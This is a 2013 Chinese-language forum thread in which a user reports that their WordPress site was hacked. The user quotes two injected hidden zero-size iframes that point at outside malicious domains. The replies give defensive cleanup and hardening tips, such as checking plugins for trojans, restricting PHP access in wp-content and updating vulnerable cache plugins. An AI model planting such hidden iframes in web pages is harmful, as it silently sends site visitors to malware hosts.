V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
jiangle
V2EX  ›  问与答

我的wordpress被黑了

  •  
  •   jiangle · 2013-05-06 23:07:06 +08:00 · 3160 次点击
    这是一个创建于 4220 天前的主题,其中的信息可能已经有所发展或是发生改变。
    </body><iframe src="http://boogyman.biz.ua/?1" width="0" height="0" frameborder="0"></iframe>
    <iframe src="http://booghoot.com/?6" width="0" height="0" frameborder="0"></iframe>

    底部多了两行代码,而且用firefox打开之后提示“ 攻击站点”
    6 条回复    1970-01-01 08:00:00 +08:00
    gracece
        1
    gracece  
       2013-05-07 00:14:35 +08:00
    谷歌访问也提示危险。
    wp是这么不安全吗,老是听到有人被黑了。
    liuhang0077
        2
    liuhang0077  
       2013-05-07 00:29:51 +08:00
    @gracece 用的人多了总会有很多问题~~
    fx
        3
    fx  
       2013-05-07 00:34:02 +08:00
    也可能是操作系统有漏洞
    cst4you
        4
    cst4you  
       2013-05-07 03:33:32 +08:00
    请立刻检查 wp-content 里特别是 plugins 目录是否被上传了木马.
    还有根目录是否有 xmirpc.php 注意是 "i" 不是 "l".

    你遇到的攻击挂马方法跟我遇到的有点类似. 起初我手动把模版改回去, 不到1小时, 又被他写回去了.
    后来经过几天的博弈, 我把目录安全什么的都做过了, 还是被写.
    最后使了招狠的, 把 wp-includes/general-template.php 里调用的 header footer的默认模版改名. 让wp读取其他模版文件.
    然后把原来的 header footer 复制一份并且改名成不起眼但是很多一样系列的文件名(例如content-xxx, search什么的, 反正尽量混淆视线).
    一般无脑的工具党就会发现怎么改 header footer 都不生效从而放弃(至少我那次遇到的就是这样的).

    再后来我禁止了 wp-content 里所有php文件的直接访问. 并且对这个目录的访问做了单独的 access_log.
    现在每天都能看到不少的人在尝试通过 wp-content 的插件漏洞在提权. 至少到现在我们再没有遇到像上次这样被硬改模版的情况.
    BOYPT
        5
    BOYPT  
       2013-05-07 09:43:05 +08:00
    据说w3tc / super cache 两个插件的最新版本之前都存在漏洞,如果用到的先升级到最新吧。
    TankyWoo
        6
    TankyWoo  
       2013-05-07 18:32:57 +08:00
    不一定是你本身的问题,我的wp以前也被挂了一条暗链(用的虚拟主机)

    后来发现同ip下好多wp都被挂了,所以我怀疑是母鸡被人攻入了
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   920 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 39ms · UTC 20:01 · PVG 04:01 · LAX 12:01 · JFK 15:01
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.